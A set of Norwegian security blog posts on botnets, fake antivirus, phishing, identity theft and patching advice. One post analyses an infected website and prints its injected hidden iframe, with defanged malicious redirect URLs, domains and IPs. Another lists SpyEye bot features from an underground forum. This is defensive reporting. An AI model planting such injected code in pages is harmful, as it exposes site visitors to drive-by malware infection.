    En Seniorforsker i Panda Security, sier: «Vår foreløpige analyser indikerer at botmasters ikke har spesiell avansert hacking- ferdigheter. Dette er svært alarmerende fordi det viser hvor effektiv distribusjon av skadelig programvare har blitt, og at relativt ufaglærte cyber-kriminelle påfører store skader og økonomiske tap.
     
    Har selv sett at på enkelte undergrunnsforum kan man få 'leie' eller hjelp til å sette opp et botnet for 4 tusen dollar og oppover. Noen større hackerferdigheter er det altså ikke snakk om.
     
    Kilde:
    www.net-security.org
    Symantec
  10. norbat
    Hele tiden forsøker hackere i mer eller mindre organiserte former å hente ut informasjon fra fremmede datamaskiner og bruke dem til kriminalitet.
     
    - Økningen de siste årene har vært formidabel. Hver time oppdages 1.800 nye trusler mot datamaskiner og nettverk via internett. For tre år siden var dette tallet så vidt over 100, sier en sikkerhetsekspert i Telenor Security Operation Centre (TSOC).



    Største trusler i 2010 vil fortsatt være:
    Drive-by: Falske og ofte skjulte henvisninger på nettsider som sender deg til utenlandske sider hvor du indirekte autoriserer tilgang til din maskin.
     
    Falske bannerreklamer: Hackere klarer å plassere falske reklamebannere på nettsider. Klikker du deg inn på disse, ender du på utenlandske nettsider hvor det etableres en bakdør til din maskin.
     
    Falske antivirusprogrammer: Billige eller gratis tilbud om installering av antivirusprogrammer som du laster ned til din datamaskin. Programvaren tar kontroll over maskinen og forlanger penger for å slutte å plage deg.
     
    Koobface: Falske oppdateringer i sosiale nettverk som Twitter, MySpace eller Facebook. Det sendes for eksempel ut invitasjoner til å se videoer som sender deg til en ondsinnet nettside.
  11. norbat
    Flere av mine kompiser har kjøpt seg Mac, og det er utvilsomt en lekker sak. Problemet er imidlertid at det argumentet som de alle bruker på hvorfor de heller vil bruke mye penger på en mac framfor å få en pc som brenner asfalt for samme pris, er at de er lei av krasj og malware.
     
    Om Mac kræsjer mindre/aldri, det vet jeg lite om, men om de tror at Mac er malwarefritt, vil de få seg en overraskelse. Pr dags dato finnes det kanskje ikke virus? for mac-systemet, men en rekke trojanere som skaper bakdører øker i takt med at Mac OS øker i utbredelse.
     
    Jeg trakk litt på smilebåndet da jeg leste følgende på en mac-forum:
    "Forskjellen (virus vs. trojanere etc) er at du ikke kan få denne (trojaner) installert på din maskin uten at du selv foretar deg noe. Det er derfor enkelt å beskytte seg mot trojanske hester."
     
    Ja, som Windowsbruker har man sagt det samme i 15 år. 95% av de infiserte pc'n er et resultat av at man aktivt har lastet ned og aktivert trojaneren. De siste prosentene er knyttet til de som slurver med å holde programvaren sin oppdatert og dermed er utsatt for exploits (i all hovedsak knyttet til 3.partsprog. av typen Adobe etc og ikke Windows). Det skal da egentlig være enkelt å beskytte seg mot trojanske hester.
     
    Men, hvorfor finnes det da langt flere pc-brukere som er infisert enn mac-brukere. Er pc-brukeren dummere, mer naiv og godhjertet som så lett lar seg lure? Svaret er antakelig litt sammensatt, men det kan ha betydning at 89% bruker Windows mens bare 5.9% benytter Mac OS. I tråd med at sistnevnte OS øker i popularitet, vil nok bildet endre seg.


     
    F-Secure har nylig utgitt et sikkerhetprogram beregnet for Mac OS

     
    Det skader ikke å tenke sikkerhet, verken for Windows- eller Mac-brukere. Velkommen etter, Mac-bruker.
  12. norbat
    Selv om Microsoft Security Essentials er på vei til å erstatte Windows Defender, så er programmet fortsatt et alternativ som beskyttelse mot spyware og annet rammel.
     
    Dette blir selvfølgelig utnyttet av de som ønsker å tjene penger på å selge falske sikkerhetsprogrammet. Derfor er det nylig lansert en falsk utgave som går under navnet Windows Defender 2010 (NB!Falsk nettside: hxxp://pcwin-live.com/ )
     

  13. norbat

    Ren PC på 1-2-3

    Av norbat,

    Ja, slik var overskriften på en artikkel som sto på VG Nett nylig. For en som bruker litt tid på det samme feltet, så kan jo dette være interessant lesning - tenkte jeg.
     
    Artikkelen var skrevet i forbindelse med "Den nasjonale sikkerhetsdagen". Og hos Norsk Senter for Informasjonssikring (NorSIS) har man tre enkle steg som vil bidra til økt sikkerhet på datamaskinen din. Alle kan gjennomføres rask, enkelt og gratis. Etter å ha tatt stegene vil maskinen din være oppdatert, virusfri og bedre enn da du startet - påstås det
     
    Stegene som nevnes er ikke dårlige, men det spørs om det er så enkelt som det sies.
     
    Steg 1: Kjør Antivirus.
    En normal infeksjon i dag, har for vane å enten slå av antivirusprogrammet og/eller hindre antivirusprogrammet fra å oppdatere seg. En del rootkit hindrer også sikkerhetsprogram i og la seg starte overhode. Så, hvis du HAR en infisert pc, ryker oppryddingen allerede her.
     
    Får du oppdatert og kjørt antivirusprogrammet ditt, så er sannsynligheten stor for at du IKKE er infisert. Om du allikevel opplever popups og annen irriterende mas fra ulike suspekte sikkerhetsprogram, så bør ikke et antivirusprogram være 1.valget da andre anti-programmer er langt råere på å fjerne slikt, f.eks. Malwarebytes Anti-Malware el. Superantispyware.
     
    Steg 2: Slå på autooppdatering
    Ja, normalt så ER denne funksjonen påslått - noe den også bør være. Er den 'plutselig' avslått (man får gjerne en melding om det fra sikkerhetssenteret), så kan det tyde på at noe har sneket seg inn. Uansett, å holde operativsystemet sitt oppdatert er en naturlov.
     
    Steg 3: Oppdater resten
    Ja. flashplayer, java m.m må holdes oppdatert da det 'jevnlig' oppdages sikkerhetshull i programvare. Både Secunia og F-Secure har testprogram som kan sjekke om det er noe programvare som er utdatert og som trenger en oppdatering.
     
    Om disse 3 stegene gjør at du vil være virusfri - tviler jeg på. Eller, jeg vet at de ikke holder. Men det er en annen sak.
     
    Surf trygt.
  14. norbat
    I 2009 hadde DNB-NOR alene 439 saker, en økning på 96% fra året før. 1395 mobilabonnement bestilt med falsk ID i 2009 hos Telenor.
     
    For å kunne opptre som deg trenger ID-tyven mest mulig informasjon. Dette er noen av metodene ID-tyven bruker:


     
    Stjele kredittkort eller bankkort
    Stjele fra postkasse eller søppel
    Tappe mobiltelefon eller PC
    Phishing (lure fra deg persondata)
    Hacking
    Virus
    Søk på internett
    Bestillingstyveri
    Stjele PIN-koder og passord
    Sosial manipulering
    Endre adresse

    Nettsiden www.idtyveri.info har samlet mye interessant stoff som kan være verdt en titt. De har også en selvtest, der du kan sjekke hvor god du er på å ta vare på din 'id-sikkerhet'.

     
    Surf trygt!
  15. norbat

    Vern om din identitet

    Av norbat,

    I dag så jeg et dansk program som het ”Det usikre internet” (NRK 2, sendt på DR i 2009 (velg 6/5)). Der ble det vist hvor lett det bla. er å dekryptere WEP, som fortsatt mange i dag benytter på sin trådløse forbindelse. Mange krypterer ikke i det hele tatt.
     
    Det er stadig vanligere at man har flere pc’er i hus, gjerne med en sentral mediaserver. Har du tilgang til nettverket, vil du også få tilgang til de delte ressursene. Enda en grunn til at man ikke bør være slapp med sikkerheten på sitt eget nettverk.
     
    I programmet ble det også tatt opp dette med ID-tyveri og hvor lett det er å skaffe seg tilgang til andres kreditkortinformasjoner. Det er et stort marked for kjøp og salg av slik informasjon.
     
    Har du lås på postkassa di? Ikke jeg heller, men kanskje det bør vurderes. Jeg fikk nylig et nytt kodekort til nettbanken min rett i postkassa. Med det i hende, så mangler man bare den personlige koden (ser bort ifra personnummeret da dette lar seg finne). Er man like lite flink til å lage seg et sterkt passord, så finnes det mange oversikter over vanlige passord som man kan tenke seg til ved å vite hvem man prøver å hacke. Til dette svarte nettbanken: "Vi vurderer ikke dette som en sikkerhetsrisiko. Man kan ikke benytte et kodekort alene til å logge inn i nettbanken. Innlogging krever i tillegg skal man kjenne fødselsnummer 11 siffer, og nettbankpassord. Et engangspassord er også kun gyldig i sesjonen det spørres etter.". Ja vel, sier nå jeg.
     
    Mye av vår ’identitet’ ligger i vår aktivitetet på nettet. Facebook, msn, gmail… - den eneste beskyttelsen vi har er å lage et godt passord - og hva vi faktisk legger ut av informasjon om oss selv.
     
    IT-eksperten som ble brukt i programmet var for øvrig Dan Egerstad, som ble kjent i 2007 for å ha brukt TOR nettverket til å finne brukernavn og passord til epostkontoer til div ambassader og regjeringer rundt i hele verden. Pga. dårlig respons fra de berørte, offentliggjorde han 100 kontoer med brukernavn og passord.
     
    Det finnes noen nettvettregler knyttet til passord. Du kan jo sjekke opp mot ditt passord.
     


     
    Et passord er personlig og må ikke overlates til andre.
    Det bør bestå av minst åtte tegn.
    Det bør helst bestå av en kombinasjon av små og store bokstaver, tall og spesialtegn.
    Det bør ikke være det samme som eller deler av brukernavnet.
    Det bør ikke være knyttet til personlig informasjon.
    Det bør ikke være tegnkombinasjon eller ord som finnes i ordbøker.
    Det bør ikke være et ord som er skrevet baklengs.
    Det bør byttes hver tredje måned og ikke være likt tidligere passord.
    Det bør ikke skrives ned.
    Det bør ikke inneholde æ, ø eller å.

     
    Mange har kankje også det samme passordet på de ulike nettjenestene man benytter?
  16. norbat

    Malware fjerner malware

    Av norbat,

    Det er ikke bare i det vanlige næringslivet det konkurreres, men også blant programmerere på den mørke siden (black hat). Det finnes flere store botnet i omløp. Det mest kjente er antakelig Zeus, som både i utstrekning og økonomisk kanskje er det største.
     
    På et undergrunnsforum kom jeg over følgende innlegg:
     

     
    Prisen på denne boten (base bundle) på nåværende tidspunkt er 500 USD. Boten inneholder:

    Formgrabbing: en avansert keyloggingsmetode for å fange webskjema data støtter Firefox, IE, Maxthon og Netscape.
    CC Autofyll: en modul som egentlig automatiserer prosessen med kredittkort svindel, og gir penger til eieren.
    PHP-MYSQL Admin Panel
    Daglig backup av databasen via e-post
    Exe String-Kilde kryptering
    FTPgrabbing (Total Commander, Notepad + +, FileZilla, og andre)
    POP3grabbing
    Usynlig i prosesserlisten, skjult fil, usynlig i autorun (register)
    Zeus-killer

     
    Det spesielle med spy-eye er at den sjekker om pc'n den infiserer allerede er infisert med Zeus. Hvis, så vil spy-eye ha mulighet til å slette den malwaren.
     
    Programmereren sier i en annen sammenheng at dette vil bli mer og mer vanlig - at malware vil slette annen malware som pc'er er infisert med slik at man kan råde grunnen alene. På spørmsål om Zeus-programmererne er sure på vedkommende bak Spy-eye, svarer vedkommende at det er de ikke fordi de tjener så mye penger - enn så lenge.
  17. norbat

    En drage til nettleser

    Av norbat,

    Comodo, som lager sikkerhetsprogrammer og som bla. har en brannmur i verdensklassen, har gitt ut en nettleser bygd på Chromium. Nettleseren ser lik ut som Google Chrome, men Comodo har hatt større fokus på personvern og sikkerhet. I dette ligger det at man har fjernet funksjoner som Comodo anser som en sikkerhetsrisiko i Chrome og lagt til funksjoner som skal gi bedre sikkerhet for brukeren.
    Comodo Dragon er selvsagt gratis og kan lastes ned fra Comodo.com
  18. norbat
    Med vinter-OL i nyhetsbildet de siste par ukene, har malware profitører som vanlig arbeidet hardt for å få mest mulig oppmerksomhet.
     
    Deres strategi er enkel: opprett ondsinnede websider med søkeord som sannsynligvis vil komme opp i nyhetsrelaterte søk knyttet til OL. Jo raskere en slik side kan settes opp, jo bedre sjanse har den til å få en høy søkemotor-rangering. Selv om det normalt ikke er så mange linker til slike sider fra andre kilder, er det svært sannsynlig at om malwareprofitørene publisert tidlig vil dette kunne løfte websiden i de øverste søkeresultatene.
     
    Hva skjer om man klikker på en slik søkelenke? Lenken kan føre til en falsk onlineskanner som forteller at pc'n din er infisert og at du trenger å laste ned et program for å fjerne truslene. Ved å laste ned programmet, vil man være nødt til å betale for å fjerne malwaren - noe det selvfølgelig ikke gjør da alt bare er lureri. I tillegg kan slik programvare åpne for annet malware og skape pcproblemer.
     
    En side jeg kom over ledet til nedlasting av en ny variant av SecurityTool - et falskt antivirusprogram: Linken førte til en nettside som først ga denne meldingen
     
    Uansett hva man velger å trykke på i bildet over, åpnes en falsk onlineskann:
     
    Om du klikker avbryt eller kryss så kommer allikevel følgende melding opp:
     
    Igjen, uansett hva du klikker, vil selve nedlastingsvinduet til programvaren sprette fra:
     
    Så, hva gjør man for å bli kvitt dette?
    Enkelt. Du lukker nettleseren/arkfanen. Så lenge du ikke velger å installere programmet vil ikke dette utgjøre noen fare.
     
    Både IE, Chrome og sikkert andre nettlesere er rimelig raske med å eksludere slike websider, dvs. de gir deg en advarsel om at du er på vei til å besøke en usikker webside.Eks. IE:
     
    Surf trygt!
  19. norbat

    Phishing

    Av norbat,

    Phishing er en betegnelse på digital snoking eller fisking etter sensitiv informasjon, som passord eller kredittkortnummer.
     
    Svindlerne kan lure deg til å gi i fra deg informasjon på flere måter. For eksempel kan de oppfordre deg til å svare på en e-post med falsk svaradresse slik at de selv mottar informasjonen fra deg.
     
    En annen metode er å oppgi en lenke i e-posten som leder til en falsk nettside der du blir bedt om å gi opplysninger. Nettsiden kan se ekte ut. Under er en knipe med slike falske sider som enten lurer fra deg brukernavn og passord og/eller kreditkortopplysninger.
     
    Facebook:

     
    WoW:

     
    Yahoo:

     
    Rapidshare:

     
    XBOX:

     
    Råd for å unngå phishing:(fra nettvett.no)
    Ikke bruk lenker til nettsider fra en e-post du har mistanke om er fra en mistenkelig eller ukjent avsender.
     
    Skal du gi fra deg personlig informasjon på en nettside, må du forsikre deg om at du er på en såkalt sikker oppkobling. En enkel måte å sjekke dette på er å se om det finnes et symbol med en liten hengelås ved adressefeltet i nettleseren. Står det HTTPS først i adressen, betyr det at nettsiden har en sikker tilkobling. Dette gir ikke noen garanti, men gjør det sikrere å gi fra seg personlig informasjon. Er du usikker kontakter du organisasjonen du skal gi informasjon til via telefon..
     
    Husk at banker aldri ber om sensitiv informasjon via e-post.
    Er du usikker på om du har gitt fra deg opplysninger som kan misbrukes, sjekk kontoutskriften nøye.
     
    Bruk antivirusprogram og brannmur. Sørg for at disse programmene, samt operativsystemet og nettleseren alltid er oppdatert.
     
    Phishingsider blir forholdsvis raskt snappet opp og meldt inn som falske sider. Nettleseren din vil derfor i mange tilfeller melde ifra om at du er på vei til å besøke en side som er meldt inn som svindel
     
    Eks. Opera:

     
    Surf trygt!
  20. norbat

    Løst!

    Av norbat,

    Selv om det bare er en liten bagatell i den store sammenhengen, så gleder det meg at forumet endelig har fått en løst-knapp. Det er ektra hyggelig at man som bruker kan komme med forslag til admin - gode forslag som blir satt ut i livet. Flott!
  21. norbat
    I et tidligere innlegg, nevnte jeg at det i forbindelse med 'større' hendelser, eks. OL i Vancouver, får man gjerne en oppblomstring av søketreff som leder til malware.
     
    Symantec har et eksempel knyttet til jordskjelvet som skjedde i Chile 27.feb. Et googlesøk kort tid etter hendelsen, ga treff som ledet til nedlasting av falske antivirusprogarm.
     
    Men, som Symantec sier: "Selv om vi ikke kan beskytte deg mot jordskjelv eller tsunamier, kan vi i alle fall hjelpe deg å unngå en ny bølge av skade på din datamaskin og din lommebok etter katastrofer av denne typen."
  22. norbat

    Skumle PDF-filer

    Av norbat,

    En kritisk sårbarhet har blitt identifisert i Adobe Reader 9 og Acrobat 9 og tidligere versjoner. Dette sikkerhetsproblemet kan føre til at programmet krasjer og kan potensielt tillate en angriper å ta kontroll over det berørte systemet. Det er rapporter om at dette problemet blir utnyttet.
     
    Adobe forventer å gjøre tilgjengelig en oppdatering for Adobe Reader 9 og Acrobat 9 11 mars 2009
    Ref. http://www.adobe.com/support/security/advi.../apsa09-01.html
     
    Skadelig PDF-filer som utnytter sårbarheten blir av Symantec oppdaget som Trojan.Pidief.E. Payloaden blir detektert som backdoor.trojan. Denne trojaneren gjør at 'angriperen 'ser skrivebordet', registrerer tastetrykk og får ekstern tilgang til pc'n.
     
    Mens man venter på patchen fra Adobe, bør/kan gjeldene forhåndstiltak benyttes:
    1. bare åpne e-postvedlegg fra personer du stoler på.
    2. Deaktivering av JavaScript i Adobe Reader
    3. Aktivering av DEP for Adobe Reader
     
     
    Hvordan deaktivere Javascript i Adobe Reader:
    1. Åpne Adobe Acrobat Reader
    2. velg Rediger->Innstillinger
    3. Velg Javascript
    4. Fjern merket ved Aktiver Acrobat Javascript
     
    Aktivering av DEP for Adobe Reader:
    Se How-DEP-can-protect-your-PC (engelsk)
  23. norbat
    I datasikkerhetssammenheng er "social engineering" et begrep som knytter seg til det å lure til seg informasjon som andre egentlig ikke ønsker å formidle eller å få noen til å utføre handlinger mot bedre viten. Denne formen for 'hacking' er i mange sammenhenger langt vanligere enn å bryte seg inn i eller bruke andre hacker teknikker for å få tilgang til data.
     
    At blogger og nettsamfunn har 'tatt av', har også malware-forfatterene registrert. Et typisk angrepsscenario innebærer at angriperne identifisere en høy trafikkert blogg eller forum med kommentarfunksjon tilgjengelig, evt. tillater anonym kommentering. Her kan angriperen skrive noe 'tillitsvekkende' og som gjør at man klikker på linken som vedkommende har vedlagt. Linken fører selvsagt til nedlasting av malware eller til nettsider der man blir bedt om å taste inn brukernavn og passord til div. tjenester man benytter eller annen personlig informasjon.
     
    MSN-phishing er et godt eksempel på hvordan man 'frivillig' gir fra seg personlig informasjon i form av brukernavn og passord. Facebook har også slitt med slike forsøk på å tilegne seg brukernavn og passord.
     
    Hele 92 prosent av alle sexrelaterte phishing-forsøk finner nå sted i sosiale medier. Det viser sikkerhetsselskapet Symantecs globale spam- og phishing-rapport for januar. En ny trend i ”adult” eller sexbasert phishing er å love brukeren gratis pornografi mot å oppgi personlig informasjon. Når brukerne har lagt inn sine personlige data, sendes de videre til en pornografisk nettside som også inneholder ondsinnet kode.
  24. norbat
    Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.
     
    Javascript-injeksjonen, som er lagt inn på siden, henter info fra:
    <iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1
    height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>
     
    Via redirect :
    hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)
    hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus
     
    Domener involvert:
    thehugetitstop.cn 91.212.65.33
    gianthighestfind.cn 91.212.65.33
    tozxiqud.cn 91.212.65.7
    vpsspeedin.ru 91.212.65.33
    ralcofic.cn 91.212.65.7
    8addition.info 210.48.154.132
     
    I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.
     
    Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til
    Flash Player
    Adobe Reader
    Office Snapshot Viewer
     
    Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check
  25. norbat
    En test gjennomført av SRI Malware Threat Center, viser at Avira og AVG kommer best ut når ny malware binærfiler blir testet mot antivirusprogrammene man finner på bla. Virustotal.
     
    Intensjonen med testen var å finne ut hvilke sikkerhetsprogram som detekterte ny malware. Testen presiserer at de fleste antivirusprogrammer vil få deteksjoner mot truslene innen noen få dager(men det hjelper jo ikke der og da).
     
    Topp 10:
    1 91% AntiVir Avira
    2 91% Sophos Labs
    3 91% Grisoft Inc
    4 90% Ikarus SecuritySoftware
    5 90% Microsoft
    6 90% BitDefender
    7 88% Norman Inc
    8 88% Kaspersky
    9 87% F-Secure
    10 86% Avast
     
    Bunn 5:
    28 59% Ewido Ewido Networks
    29 28% Webwasher-GatewaySecure Computing
    30 22% NOD32v2 ESET LLC
    31 18% Prevx1
     
     
    Kilde: http://mtc.sri.com/live_data/av_rankings/
×
×
  • Opprett ny...